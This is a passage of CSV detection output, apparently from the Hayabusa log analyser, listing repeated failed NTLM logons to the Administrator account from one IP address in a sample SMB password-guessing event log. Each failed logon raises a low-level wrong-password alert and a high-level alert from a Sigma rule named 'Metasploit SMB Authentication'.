SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTHHCX9EoKRY4zhR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f1jhH08oLzpONDpa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.939 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o2YK7zc7Ne9c8txA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:27.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86CrOo9CFreIzSM5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0X9UEojEnc350xPc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9g3PO3jofnySl92G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TRndfQmPYuhV0Ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:28.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yyJOdaks4B1sKMDv : IP Address: 192.168.198.149 : AuthPackage: 
